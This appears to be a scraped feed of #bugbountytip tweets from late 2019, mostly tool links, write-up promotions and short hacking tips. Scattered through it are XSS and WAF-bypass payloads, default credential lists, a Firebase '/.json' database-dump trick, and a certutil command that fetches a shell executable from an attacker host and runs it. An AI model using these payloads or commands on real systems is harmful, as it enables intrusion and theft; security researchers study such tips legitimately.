2019-12-02 18:33:32
0 Short Note On The $3000 XSS Found On the Public Program on @Bugcrowd #bugbountytip #bugbounty https://t.co/Avh1EW66KA https://t.co/Ef7EW6LwSg
â‚Źđ””đ”­đ”©đ”Źđ”Šđ”±đ” 0𝔡𝔱𝔯
@vanshitmalhotra


2019-12-02 17:07:17
0 Million Users PII Leak Data Leak Follow Us 💰💰💰💰 https://t.co/iNczOcGmCt Subscribe to Youtube Chanel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops https://t.co/XOMt0BJnnn
â‚Źđ””đ”­đ”©đ”Źđ”Šđ”±đ” 0𝔡𝔱𝔯
@vanshitmalhotra


2019-12-02 17:03:30
0 How I could delete Facebook Ask for Recommendations post’s place objects in comments Follow Us 💰💰💰💰 https://t.co/iNczOcGmCt Subscribe to Youtube Chanel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips https://t.co/3jmDgBbzsK
â‚Źđ””đ”­đ”©đ”Źđ”Šđ”±đ” 0𝔡𝔱𝔯
@vanshitmalhotra


2019-12-02 17:00:08
2 Subdomain Takeover Via Campaignmonitor . Com Follow Us 💰💰💰💰 https://t.co/iNczOcGmCt Subscribe to Youtube Chanel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops https://t.co/nmegpRCRSs
â‚Źđ””đ”­đ”©đ”Źđ”Šđ”±đ” 0𝔡𝔱𝔯
@vanshitmalhotra


2019-12-02 16:58:31
0 Subdomain Takeover Via https://t.co/CYXQhAOtlh https://t.co/nmegpRCRSs Follow Us 💰💰💰💰 https://t.co/iNczOcGmCt Subscribe to Youtube Chanel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops
â‚Źđ””đ”­đ”©đ”Źđ”Šđ”±đ” 0𝔡𝔱𝔯
@vanshitmalhotra


2019-12-02 16:55:23
0 Disable Any Unconfirmed Account in Facebook https://t.co/p2TQTXMYW5 Follow #Hackdoor - Facebook - https://t.co/iNczOcGmCt Youtube - https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity #ceh
â‚Źđ””đ”­đ”©đ”Źđ”Šđ”±đ” 0𝔡𝔱𝔯
@vanshitmalhotra


2019-12-02 16:52:38
0 Prowler: AWS CIS Benchmark Tool https://t.co/TfvuLHUcqN Follow #Hackdoor - Facebook - https://t.co/iNczOcGmCt LinkedIn - https://t.co/nhF4SN8Sd5 Youtube - https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops
â‚Źđ””đ”­đ”©đ”Źđ”Šđ”±đ” 0𝔡𝔱𝔯
@vanshitmalhotra


2019-12-02 16:48:25
2 Scout Suite is an open source multi-cloud security-auditing tool, which enables security posture assessment of cloud environments. https://t.co/ABDslQah52 Follow Us 💰💰💰💰 https://t.co/iNczOcGmCt #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #DevOps
Fisher
@Regala_


2019-12-02 16:28:59
2 I did this super tiny extension a while back that you can now find in the BApp Store. Just go to your Site Map -> Select All -> Right click -> Copy sub domains 🙂 #bugbounty #bugbountytip https://t.co/DiwqY76TUk
ghostlulz
@ghostlulz1337


2019-12-02 15:23:47
0 ITS CYBER MONDAY. If your looking to make a living doing bug bounties you may want to get a copy of my book. I'll show you exactly how I operate. This is the last time i'll post this 🙂 https://t.co/zJFRZjg5q2 #bugbountytip #bugbountytips #bugbounty #osint #infosec #dfir https://t.co/VZ8FJPVoIO
Dujunayan
@dujunayan


2019-12-02 15:11:29
0 Google it, this's how make shit done <3 #bugbountytip
%00Termi
@Termi1215


2019-12-02 14:26:50
0 Sometimes i just wonder from where @ippsec has got all the knowledge in the world. Oscp , pentesting , bug bounty,red team just watch his videos. @elonmusk of pentesting world. #bugbounty #bugbountytip
ALL ABOUT HACKER
@AboutHacking


2019-12-02 13:21:30
0 How to start Bug Bounty Read -: https://t.co/b9iplwe1i8 #bugbountytip #bugbounty #bugbountytips #cybersecurity https://t.co/tkIgmb7yBH
🇳🇬Sam-Olayemi
@cykic_


2019-12-02 06:58:32
1 XSS cheat sheet contains many vectors that can help you bypass WAFs and filters #CyberSecurity #bugbountytip https://t.co/HfYpEaiOZ6
securibee 🐝
@securibee


2019-12-02 05:26:50
2 Free course "Automate the Boring Stuff with Python Programming" https://t.co/VfpiAK9jgw #bugbountytip #infosec
Sanketh Sharath
@sharathsanketh


2019-12-02 05:03:25
0 I use the community edition of Burp for bug hunting. Its a great tool, but I am really glad I am investing time learning how to use Zap too. This way I could leverage the features I am missing out on the Burp Pro edition. #bugbounty #bugbountytips #bugbountytip
ghostlulz
@ghostlulz1337


2019-12-01 22:10:28
6 If you are looking to make đŸ€‘moneyđŸ€‘ as a pentester or bug bounty hunter you will want to get a copy of my book. WARNING INDUSTRY SECRETS WILL BE DROPPED!💰💰 https://t.co/zJFRZjg5q2 #bugbountytip #bugbountytips #bugbounty #infosec #redteam #osint #dfir #pentest https://t.co/gmUrqA1tW7
soon
@soon73564093


2019-12-01 18:20:31
3 Xss Go: https://t.co/hIsozDABTH Paste payload: "><script>alert(document.domain)</script> or "><script>alert(document.cookie)</script> @EBHORSMAN #bugbounty #bugbountytip https://t.co/kOp6LxATOV
â‚Źđ””đ”­đ”©đ”Źđ”Šđ”±đ” 0𝔡𝔱𝔯
@vanshitmalhotra


2019-12-01 18:09:43
1 Subscribe to Our Telegram Channel and Never miss an update on Zero day and New Bug Bounty Tips and Tricks https://t.co/pfl0JWOIqo Follow Us 💰💰 https://t.co/iNczOcXY13 Subscribe to Youtube Chanel for Free Tutorials https://t.co/42lWP1m84s #BugBounty #BugBountyTip #pentest
Brijesh Shah
@Brijesh1997


2019-12-01 16:44:37
0 URGENT: Best wordlists for fuzzing subdomains required. Found subdomain/assets/6193029F7C344C93BC50CBDBDC9AC91E.xls Need to find what else is exposed publicly. #bugbounty #bugbountytip #bugbountytips
lordsaibat
@lordsaibat


2019-12-01 13:58:37
1 @RealTryHackMe This is a great start into hacking and bug bounties if you are looking. All the rooms give you clear targets to hunt for. #bugbountytip #Hacking #infosec
Brute Logic
@brutelogic


2019-12-01 13:33:23
3 Old #bugbountytip from 5 years ago! https://t.co/7I6aZ5Fo6v
ninetynine
@ninetyn1ne_


2019-12-01 09:49:33
1 Quick tip - If Cross Origin Request allowed only from https://*.target.com, then try finding an XSS on any subdomain of the target, even if they are out of scope, and initiate a CORS request using that XSS. đŸ€˜đŸ€˜ #bugbountytip #BugBounty
David Dale
@meathacker


2019-12-01 04:01:02
0 Hearing about IDORs? Not sure what they are? https://t.co/3MEbfcCL4j Great resource! #bugbountytip @Bugcrowd @samhouston
Armin Gojak
@fyoozr


2019-11-30 22:52:18
0 Nice step-by-step walkthrough for finding XSS by @brutelogic https://t.co/A7PsjSLSQQ #bugbounty #bugbountytip
Laszlo Kokai
@kokail


2019-11-30 20:43:11
0 RT @rez0__: Finally took the time to do a write up! Wrote up my first RCE (was also my first critical at that time): https://t.co/76981mCgLk #bugbountytips #bugbountytip There’s some shout-outs in this post to: @healthyoutlet @Michael1026H1 @NahamSec @stokfredrik @TomNomNom
Leonishan
@leonishan_


2019-11-30 19:32:04
3 Exploiting XSS with 20 characters limitation #XSS #bypass #bugbountytip #bugbounty https://t.co/k51H9OkNso
Ammar AmerđŸ‡žđŸ‡Ÿ
@cry__pto


2019-11-30 18:03:10
12 -1-Multiple Ways to Get root through Writable File.pdf: https://t.co/442zfZCBtm -2-CTF Series : Vulnerable Machines.pdf: https://t.co/DJMEurYB0d -3-Red Team Tips.pdf: https://t.co/NAJAIeEsK7 #bugbountytip #redteam #PenTest #Hacking #ctf #cybersecurity #infosec #BugBounty #OSINT
Sebastian Wieseler
@kickino


2019-11-30 05:16:25
1 Btw, my slides from my @div0_sg talk about XSS vulnerabilities are here: https://t.co/X968arapPd Enjoy 🙂 #bugbountytip #bugbountytools #bugbounty #togetherwehitharder
𝚛 𝚎 𝚣 đŸ¶
@rez0__


2019-11-30 03:14:29
1 Finally took the time to do a write up! Wrote up my first RCE (was also my first critical at that time): https://t.co/37N78DLalr #bugbountytips #bugbountytip There’s some shout-outs in this post to: @healthyoutlet @Michael1026H1 @NahamSec @stokfredrik @TomNomNom
Brijesh Shah
@Brijesh1997


2019-11-29 19:08:04
2 dig A <subdomain> is returning <subdomain> 60 IN SOA https://t.co/SBKgEiAHvQ. https://t.co/UerpKCDxNL 1 7200 900 120960060 Can i takover this subdomain? #bugbounty #bugbountytip #bugbountytips
ALL ABOUT HACKER
@AboutHacking


2019-11-29 18:54:34
0 Cross Site Scripting attack Basic to advance [ part 7]- Basic Burp suite Read:https://t.co/GRACpUbkBi #cybersecurity #cybersec #bugbounty #BugBountyTip #bugbountytips https://t.co/YF94iI795N
Hussein Daher
@HusseiN98D


2019-11-29 18:40:48
0 This was a really hard time for me, I'm back now. Thanks to everyone for your support and all the messages I got. A #bugbountytip will follow soon. Take care
ghostlulz
@ghostlulz1337


2019-11-29 12:55:16
0 Today is BLACK FRIDAY! If you are trying to make a living doing bug bounties you may want to get a copy of my latest book. I show you exactly how I hunt from start to finish. https://t.co/zJFRZjg5q2 #BugBounty #bugbountytips #bugbountytip #BlackFriday2019 #osint #dfir #infosec https://t.co/d1zC3PS0XR
intigriti
@intigriti


2019-11-29 12:38:38
3 đŸ›ïžIt's also #BlackFriday in #BugBounty land 🛒! Harvest all the coupon codes, try this #BugBountyTip by @quintenvi and score some bounties! 💰 https://t.co/mZnQGkOnF3
Arif Khan
@payloadartist


2019-11-29 06:56:15
0 Nice step-by-step walkthrough for finding XSS by @brutelogic https://t.co/d998DJHlHm #bugbounty #bugbountytip
Ammar AmerđŸ‡žđŸ‡Ÿ
@cry__pto


2019-11-28 23:28:18
7 -Top 40 Best Linux Commands Cheat Sheet. Get It Free Now.pdf: https://t.co/2iKmWinQuN -Complete Google Dorks List in 2019 For Ethical Hacking and Penetration Testing.pdf: https://t.co/hdYVSGNQYs -Blue Team Tips.pdf: https://t.co/lq74aWZo9x #OSINT #bugbountytip #Linux #pentest
bugbountytip
@a_l_e_r_t_1_


2019-11-28 21:05:30
0 Happy Thanksgiving!! Bug bounty tips just 1 $ for 8 hours. Lets go guys. 😂 Lets hacking.. https://t.co/JPaA4CKmfO #bugbountytips #bugbountytip https://t.co/ZEIBuwiUDl
bugbountytip
@a_l_e_r_t_1_


2019-11-28 19:29:47
0 Hi guys. Subscribe my youtube channel for PoC and tutorial videos.. https://t.co/yyqYNBzlhi #Bugbountytips #Bugbountytip
chaitanya
@chaitanya0888


2019-11-28 19:17:14
3 #bugbounty #bugbountytips #bugbountytip đŸ˜‚đŸ˜‚đŸ˜‚đŸ˜‚đŸ˜‚đŸ˜‚đŸ€Ł So, I got 1year free VPN from @wifimask Thanks to wifimask https://t.co/zLrurx34Zm
Pascal S
@PascalSec


2019-11-28 16:58:06
0 #bugbountytip huge productivity boost needed? Go and check out https://t.co/aZfbzgYuLc in case you use Firefox for testing. This eases multiple account / tenant testing by a mile. Shoutout to @infenet, who showed me this add-on in the first place! đŸ„ł
à€ˆà€¶à€Ÿà€š à€žà€żà€‚à€č
@R0X4R


2019-11-28 10:24:17
1 Something interesting for Bug Bounty Hunters. #bugbountytips #bugbounty #bugbountytip #bughunter #hacker #hacking https://t.co/sN4tuXtDce
Random Robbie
@Random_Robbie


2019-11-28 09:25:29
3 #bugbountytip when dealing with ysoserial and windows machines get a shell by doing certutil.exe -urlcache -split -f http://yoursite/shell.exe shell.exe & shell.exe Downloads and renames file and then runs it. save messing with powershell struggles.
Hendrik
@hendrikvb


2019-11-27 21:08:43
1 Grab your #pentesting course fix here during super #blackfriday deal at @PentesterLab #infosec #bugbountytip https://t.co/R2M2j9Q3dO
Elsadat
@M0_SADAT


2019-11-27 19:20:34
3 Today I finished my exams and So excited to find P1 after 2 hours of testing at private program found SQL injection😁and while reporting the issue discovered it's Out of scope subdomain💔 #bugbountytip read the target scope carefully to avoid this kind of heartbreaks #bugbounty
PaweƂ HaƂdrzyƄski
@phaldrzynski


2019-11-27 18:32:50
2 @Hogarth45_ND @plmaltais You can make it even shorter (and get rid of white-space characters): text'/\u0061\u006C\u0065\u0072\u0074`1`// or when slashes are forbidden: text'-\u0061\u006C\u0065\u0072\u0074`1`-' #xss #bugbountytip
Johns
@Johnssimon22


2019-11-27 14:18:10
2 How was i able to access a disabled/hidden feature with the help of burpsuite match and replace feature #bugbountytip #bugbounty https://t.co/q6O93zv2uu
AkaaZaan
@AkaaZaan


2019-11-27 12:07:36
0 infosec people drop links, where I can learn Regex!!! #bugbountytip #bugbounty
bugbountytip
@a_l_e_r_t_1_


2019-11-27 11:55:50
1 (Just a little bit earning for my master degree).. Learn & Hack & Earn https://t.co/fR7SA5JafD #BugBountyTip #xss #xxe #sqli #ssrf #rce #bughunting #bughunters #hackerone #bugcrowd #ruby #python #idor https://t.co/sGQVdvW3cY
bugbountytip
@a_l_e_r_t_1_


2019-11-27 10:50:40
0 Party Time for laravel 😅 #bugbountytips #bugbountytip https://t.co/mubsogY68J
ghostlulz
@ghostlulz1337


2019-11-27 05:25:02
9 There are tuns of tools for horizontal and vertical domain enumeration. I like to use Amass. In my youtube video I explain how to effectively use Amass in your reconnaissance process. https://t.co/ysW9JguyCV #bugbounty #bugbountytip #bugbountytips #infosec #amass #redteam
Ammar AmerđŸ‡žđŸ‡Ÿ
@cry__pto


2019-11-26 23:19:33
5 -subscribe to my youtube channel now -advanced videos tutorials about all hacking fields -parrotsec OS is the OS that gonna be used in the courses -learn ethical hacking in detail. https://t.co/m2akiMCaZI #bugbountytip #redteam #pentest #cybersecurity #malware
bugbountytip
@a_l_e_r_t_1_


2019-11-26 19:03:28
0 Look everywhere. Every user input, every parameter, cookies, headers . You can do it. All you need is patience and more reading.. #bugbountytip #bugbountytips https://t.co/Z49RnHRAxC
Vivek Yadav💙 #Scaffold
@viveky259259


2019-11-26 18:40:26
0 Here's one more bug. This time by Spotify. In #payment section. When I choose #UPI as #payment at that time it should ask me #upi id/pin/address not postal pin. @Spotify @spotifyindia @BugBountyHQ #bugbountytip #bug #music #app #AndroidDev #SpotifyPremium https://t.co/HQ3J1V6mrA
ghostlulz
@ghostlulz1337


2019-11-26 18:21:56
8 Seriously, another unauthenticated database. Google Firebase is a ripe target for getting easy wins, just append "/.json" to the URL and it dumps the entire database. More info on my blog: https://t.co/WGzatNLO3C #BugBounty #bugbountytips #bugbountytip #firebase #infosec
Ananda Dhakal
@dhakal_ananda


2019-11-26 15:36:59
1 Feedback from a private program on @Hacker0x01. They had closed the report as N/A because they did not quite get the report. I made sure to provide all the details clearly once again and it is pending resolution. [1/2] #hackerone #bugbounty #bugbountytip https://t.co/kris0pXagG
Üzeyir đŸ‘šđŸ»â€đŸ’»
@destanuzeyirr


2019-11-26 12:57:15
0 Does anyone know Cookie Based XXE , I may need some help #bugbounty #bugbountytip #togetherwehitharder
Ammar AmerđŸ‡žđŸ‡Ÿ
@cry__pto


2019-11-26 11:28:52
3 -Undetectable C#&C++ Reverse Shells.pdf: https://t.co/08CJhmLAbr -35+ Best Free NMap Tutorials and Courses.pdf: https://t.co/wNd4XNabzv -HTB: Luke.pdf https://t.co/dFYLXTo7zb -How to become a cybersecurity pro.pdf: https://t.co/ODbsUfZpe4 #bugbountytip #hacking #pentest #redteam
Alexander Khovansky
@al_khovansky


2019-11-26 07:50:56
0 *cough* Command-Option-F dangerouslySetInnerHTML *cough* #bugbountytip https://t.co/QScWlAc9Km
tololovejoi
@tolo7010


2019-11-26 00:27:09
2 Your weakness is determined by how do you live with your success. Your strength is determined by how do you handle your difficulties. #motivation #bugbounty #bugbountytip #infosec #hacking #bugbountytips #motivationquotes
Ismayil Tahmazov
@Tismayil1


2019-11-25 21:36:00
0 Sharing is good. Sharing increases happiness. #bugbounty #bugbountytip #bugbountytips #infosec @Nep_1337_1998 https://t.co/VWoZ4xc7cG
Brodie Codie
@brodie_codie


2019-11-25 20:41:20
0 I started doing #bugbounty in Sept, set a goal to reach top 50 in this program... Almost there Tip 2. KEEP READING #movingup #10000Hours #KEEPGOING #perseverance #Bugbountytip #bugbounty @emenalf 👀 https://t.co/YK0XF6uxkb
m0z
@LooseSecurity


2019-11-25 16:42:45
0 Someone just told me they once found company credentials on pastebin. #bugbountytip #bugbounty #bugbountytips #bugbounties #infosec
Security Executions Code
@pwn0sec


2019-11-25 16:35:17
0 Web cache poisoning attack https://t.co/G5ahhQidlh #bugbounty #bugbountytip #bugbountytips #webcache_poisoning_attack
drivertom
@drivertomtt


2019-11-25 16:13:40
0 @Xiaomi #bugbountytips #bugbountytip Never dig ANY vulnerabilities in products that are not admitted by their vendors. https://t.co/MpBnJuVmIh
Security Executions Code
@pwn0sec


2019-11-25 14:46:07
0 Web cache poisoning attack https://t.co/VPiOxCGk3K #bugbounty #bugbountytip #bugbountytips #webcache_poisoning_attack
Wh11teW0lf
@Wh11teW0lf


2019-11-25 11:23:55
5 #bugbountytip Default credentials that i always try: admin:admin test:test admin:password admin:pass [email protected]:test [email protected]:test (try with all domains that belong to company) [email protected]:[email protected],com
Security Executions Code
@pwn0sec


2019-11-25 10:50:26
0 Bug Bounty Panasonic : Reflected (XSS) Vulnerability https://t.co/LnMgHCYvxW #bugbounty #bugbountytip #bugbountytips #xss
Pankaj đŸ‡łđŸ‡”đŸ‡źđŸ‡ł đŸ‡·đŸ‡ș
@Nep_1337_1998


2019-11-25 10:47:48
0 Thank you @Tismayil1 for your notes Yes I was awarded with €600. 😍😍 Tools Sub Scanner : https://t.co/hZCWhAbzEm Dir Scanner : https://t.co/9n9y4T5EXE Git Dumper : https://t.co/7z9cdDA26W #BugBounty #bugbountytips #bugbountytip #whitehat #infosec https://t.co/SLAzoRn8Nz
Vishnu Vardhan Gadupudi
@VishnuGadupudi


2019-11-25 08:13:46
0 Look out the window...if that’s not your dream view...get back to work! #bugbountytip
nutronex
@nutronex


2019-11-25 07:12:48
0 Lfi (cannot use log poison)> download source codes > found database credentials > found hidden admin panel > tried to login admin panel with these credentials > success > file upload > rce #bugbountytip
Vishnu Vardhan Gadupudi
@VishnuGadupudi


2019-11-25 06:07:56
0 Cool video about vim 😀 #bugbountytip https://t.co/tBsAbNk3UO
ninetynine
@ninetyn1ne_


2019-11-25 04:43:27
0 Quick tip - If '/something' => 403 Try - '/something/' '/something/%20' '/something.html' '/something.json '/something/?anything' '/something#' Works sometimesđŸ€˜ Happy hacking....!!! #bugbounty #bugbountytip
Mashoud1122
@mashoud1122


2019-11-24 21:42:23
1 I just published my 1st Write UP.Writing it was harder than I thought. here you go: CORS Misconfiguration ->Account TakeOver [Out of scope to grab items In-Scope] #BugBounty #BugBountyTip #BugBountyTips https://t.co/6Ke09g37L5
Nosense
@Nosense08537389


2019-11-24 19:57:15
1 Hello friends! Im trying the exploit 44298 with kernel 4.4.0-87 and ubuntu 16.04.3 but when i run it it provides me invalid argument. May someone can help me what i should do? #bugbounty #hackthebox #PenTest #bountybug #bugbountytip #CyberSecurity #Hacking
đŸ‘»in🐚
@0xerror


2019-11-24 19:09:39
3 XSS News: @spyerror: 'Cloudflare {XSS} «byPass detection» `payloadÂŽ; %3Cimg src='null' onerror=alert('spyerror')%3E 🏆 #BugBounty #BugBountyTip #WAF #infosec ' https://t.co/XopkzOyBE8, see more https://t.co/4VACxHYGGn
BlackClover
@Bc10ver


2019-11-24 19:09:39
2 Top story: @spyerror: 'Cloudflare {XSS} «byPass detection» `payloadÂŽ; %3Cimg src='null' onerror=alert('spyerror')%3E 🏆 #BugBounty #BugBountyTip #WAF #infosec ' https://t.co/mW90LakWPL, see more https://t.co/fVnXn9Z0FJ
Pratik Yadav
@PratikY9967


2019-11-24 17:31:01
8 Ssti while sending money from one account to another .I inserted a normal payload {{7*7}} in note section. Probably others have missed this bug because no one want to spend small amount for testing . #bugbounty #bugbountytip https://t.co/k4dq1Xa3Tn
/𝒅𝒆𝒗/𝒏𝒖𝒍𝒍 揰鱹
@spyerror


2019-11-24 13:24:05
6 Cloudflare {XSS} «byPass detection» `payloadÂŽ; %3Cimg src='null' onerror=alert('spyerror')%3E 🏆 #BugBounty #BugBountyTip #WAF #infosec https://t.co/oHTNwiv6Au
ghostlulz
@ghostlulz1337


2019-11-24 13:21:21
9 If your wanting to become a full time bug bounty hunter or penetration tester you may want to get a copy of my book. WARNING INDUSTRY SECRETES WILL BE DROPPED. https://t.co/zJFRZjg5q2 #BugBounty #bugbountytip #bugbountytip #infosec #appsec #redteam #PenTest #DFIR #OSINT #xss https://t.co/iBiJBKWwPU
vinod3070
@vinod3070


2019-11-24 11:37:41
0 It's a project management tool, if I put my vps link in the group chat box I get GET req to my VPS. Nothing else is working. Any leads ? #bugbountytips #bugbountytip #hackerone #recon #ssrf
luis madero
@_Y000_


2019-11-24 00:27:50
3 Explotando vulnerabilidad CORS.(cross origin resource sharing) #hacked #cors #bugbountytip #bugbounty #CyberSecurity https://t.co/vWzRICB3T1
Shammah Agwor
@Zealsham


2019-11-23 23:01:26
0 Search shodan for “aquatone_report.html” get access to dozen of recon data from other bug hunters 😂😂. #Bugbountytip #bugbounty
Halil AHMAD
@Halilahmadd


2019-11-23 21:39:11
4 Cloudflare Bypass Payload:<svg onload=prompt%26%230000000040document.domain)> Hex: <svg onload=prompt%26%23x000000028;document.domain)> #BugBounty #XSS #BugBountyTip #infosec #Bypass #Hackerone #Firewall #Security @XssPayloads
healthyoutlet
@healthyoutlet


2019-11-23 20:49:38
0 Get all the urls out of a sitemap.xml with curl and xmllint in a bash oneliner. curl -s https://t.co/A6bYnXdhNI | xmllint --format - | grep -e 'loc' | sed -r 's|</?loc>||g' #bugbountytip
ticarpi
@ticarpi


2019-11-23 20:40:15
3 jwt_tool v1.3.2 now has improved 'Spoof JWKS' functionality https://t.co/yA6KVOSEqO #jwt #jwks #bugbountytip #netsec https://t.co/uH8H4LwB9J
Pavandeep
@Pavandep8


2019-11-23 15:43:20
0 Look what I shared: SQL Injection Step By Step Part 1 - Nilesh Sanyal - Medium @MIUI| #bugbountytip #Hacker #security https://t.co/deek38JH50
Nick || hunt4p1zza
@ngkogkos


2019-11-23 15:08:38
6 Burp has many features to help your workflow & better -> more bugs. In my @Burp_Suite proxy, I constantly use a search regex pattern that includes standard placeholders I use within my payloads, such as zzz/xss, and I keep adding to it. #burpsuitetip #bugbountytip #BugBounty https://t.co/3CHDtFGQeF
Paresh
@Paresh_parmar1


2019-11-23 10:10:04
8 #bugbountytip decompile android app. and go to : Resources > resources.arsc > res > values > strings.xml search for *.firebaseio.com in xml file. ,and open browser try https://*.firebaseio.com/.json , you might find read access to database there. #bugbountytips . https://t.co/eZPSqnAbWV
ninetynine
@ninetyn1ne_


2019-11-23 08:24:59
0 XSS tip - when looking for XSS, try functions like - 'confirm()' and 'eval()' instead of 'alert()' & 'prompt()' to bypass the WAF. 🧐 #bugbountytip #BugBounty
ghostlulz
@ghostlulz1337


2019-11-23 07:08:39
9 Expanding your scope on a bug bounty program is a great way to gain more vulnerabilities.Horizontal domain enumeration is a technique used to find domains of an organization. More information on my youtube video: https://t.co/nrVeAWSmxV #bugbountytip #BugBounty #bugbountytips
HackIsOn Âź
@hackison


2019-11-23 04:44:08
13 Everytime shodan gives a surprise to our #cybersecurity community 😎😎 Utilise it everyone đŸ€— #BugBounty #bugbountytip #bugbountytips #hacking #cybersecurity #linux #Ubuntu #hacking #hackers #owasp #bug #vulnerability #redteam #redteaming https://t.co/XAYGEChP7d
Ammar AmerđŸ‡žđŸ‡Ÿ
@cry__pto


2019-11-22 19:13:56
15 -Web Application Penetration Testing Course.pdf: https://t.co/GlebM7I7b0 -20 Best HTML Cheat Sheet Of 2019 | With All New HTML5 Tags.pdf: https://t.co/59tuOLtNSb -Fasten your Recon process using Shell Scripting.pdf: https://t.co/33JZAQ2k4n #html #Hacking #bugbountytip #PenTest
healthyoutlet
@healthyoutlet


2019-11-22 18:41:00
0 1) Find as many domains as you can that are owned by the target org: https://t.co/sTkppJra4w 2) run subdomain discovery on all of them 3) make a wordlist of all discovered subdomains 4) run massdns on in scope domains with that wordlist. #bugbountytip
florens
@florens25301329


2019-11-22 17:27:55
0 Need some help to exploit DOM-XSS will share bounty! #BugBounty #bugbountytip #togetherwehitharder
Yash sariya
@stylish_hacker_


2019-11-22 08:33:44
0 How to become a successful bug hunter https://t.co/nYs8qifcA0 #bugbounty #bugbountytip #bugbountytips
Yash sariya
@stylish_hacker_


2019-11-22 08:32:27
0 What is web server fingerprint https://t.co/BdmKPXFPpd #bugbounty #bugbountytip #bugbountytips
Yash sariya
@stylish_hacker_


2019-11-22 08:26:59
0 Complete Recon Process A to z https://t.co/msMzOd0Ja7 #bugbountytip #bugbounty #bugbountytips
Udit Bhadauria
@udit_thakkur


2019-11-22 06:59:54
0 @NahamSec just uploaded his talk at @defcon "Owning The Clout Through SSRF" with @daeken! https://t.co/jb7XuGIXyN The pdf can be found: https://t.co/R7gbIXgItf & if you want to practice it, consider looking into @PentesterLab's exercise of brown badge. #infosec #bugbountytip
Brodie Codie
@brodie_codie


2019-11-22 05:04:54
0 so aquatone has it's own probe to check if links are alive with this option found 2 admin panes this way "cat List.txt| aquatone -ports xlarge" #bugbountytips #bugbountytip
Securisec 🚀
@securisec


2019-11-22 01:33:31
0 "RT RT Tismayil1: Yes I earned $3180. Tools : Sub Scanner : https://t.co/VcdATHEpOs Dir Scanner : https://t.co/HJAwQE187M Git Dumper : https://t.co/ZKqKYdHhkG #BugBounty #bugbountytips #bugbountytip #whitehat #infosec https://t.co/UGa0yAvGEx"
healthyoutlet
@healthyoutlet


2019-11-21 23:14:43
0 #bugbountytip keep your hackerone inbox open so that it's super easy to check for updates on that crit every 15 minutes for the next week. Bonus tip: Have a pint of ben and jerry's ready for when it gets marked dupe.
Binit Ghimire
@WHOISbinit


2019-11-21 19:51:51
1 When you are using a XSS payload in email field during registration and it doesn't execute after creating the account, try choosing the "Resend Activation Email" option. Developers are likely to forget filtering the email in activation email resent message. #XSS #BugBountyTip
Ismayil Tahmazov
@Tismayil1


2019-11-21 19:03:42
18 Yes I earned $3180. Tools : Sub Scanner : https://t.co/LegySAU3sZ Dir Scanner : https://t.co/1L6MutcaEc Git Dumper : https://t.co/IOsHlTWCP2 #BugBounty #bugbountytips #bugbountytip #whitehat #infosec https://t.co/6Qy1JEiDWM
Vikash Chaudhary
@OffensiveHunter


2019-11-21 05:31:42
2 #BugBountyTip completes the first checklist that I gave it to you yesterday, now move to on these vulnerabilities spend some time to read about these topics. if you want to learn live bug bounty hunting you can subscribe to my second course i.e Offensive
https://t.co/ji3V0Sxi5a
Mourad
@SecuAudit


2019-11-20 22:27:32
0 The worst Bug Bounty program : You spend your holidays trying to help them to secure their online business . after 45days when you ask for an update they just get worse and treat you like shit in return ,Bug Hunters have no value in this chain #bugbountytip #BugBounty #pentesting
florens
@florens25301329


2019-11-20 20:18:04
2 Finally got the last bit working so i can finish the practical for XXE!! Notes will be available today/tomorrow! #bugbountytip #Bugbounty
itsmenaga
@nagarockshard


2019-11-20 17:17:24
0 After seeing *.domain.com ...Recon Script Pop-ups 😛😂 #BadBugBountyPickUpLines #bugbountytip
Yadhavi
@PrincessYadhavi


2019-11-20 16:57:27
0 As Defcon 27 videos uploaded to youtube, which talks are must watch for bug bounty hunters? #defcon #bugbounty #bugbountytip #bugbountytips
Ali TĂŒtĂŒncĂŒ
@alicanact60


2019-11-20 16:27:34
0 Hi there! I will share a vulnerability which I found on Facebook. PoC video or Write up? Which one do you prefer? The survey will be available for 2 days and then, I will publish it. Select one! #BugBounty #bugbountytips #bugbountytip
Daher Mohamed
@DaherMohamed4


2019-11-20 15:37:46
0 My first BB Write Up : How I paid 2$ for a +1000$ XSS https://t.co/uv11CIACuA #BugBounty #bugbountytips #bugbountytip
RIPS Technologies
@ripstech


2019-11-20 15:36:25
2 Find out how Simon found 5 #WordPress core 0days, in our #security whitepaper: ->https://t.co/U7VCsBglqR #bugbounty #bugbountytip #bugbountytips #AppSec https://t.co/fNU3DID063
â‚Źđ””đ”­đ”©đ”Źđ”Šđ”±đ” 0𝔡𝔱𝔯
@vanshitmalhotra


2019-11-20 13:18:12
0 Get Cyber Security and Technology Internship with HACKDOOR Follow Us 💰💰 https://t.co/iNczOcGmCt Subscribe to Youtube Chanel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity https://t.co/KskyHzVwvW
â‚Źđ””đ”­đ”©đ”Źđ”Šđ”±đ” 0𝔡𝔱𝔯
@vanshitmalhotra


2019-11-20 13:10:22
0 Follow Us 💰💰 https://t.co/iNczOcGmCt Subscribe to Youtube Chanel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity #hackerone https://t.co/u2LdRIokeL
â‚Źđ””đ”­đ”©đ”Źđ”Šđ”±đ” 0𝔡𝔱𝔯
@vanshitmalhotra


2019-11-20 13:08:49
0 Follow Us 💰💰 https://t.co/iNczOcGmCt Subscribe to Youtube Chanel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity #hackerone https://t.co/Bh0bARIGBh
â‚Źđ””đ”­đ”©đ”Źđ”Šđ”±đ” 0𝔡𝔱𝔯
@vanshitmalhotra


2019-11-20 13:06:58
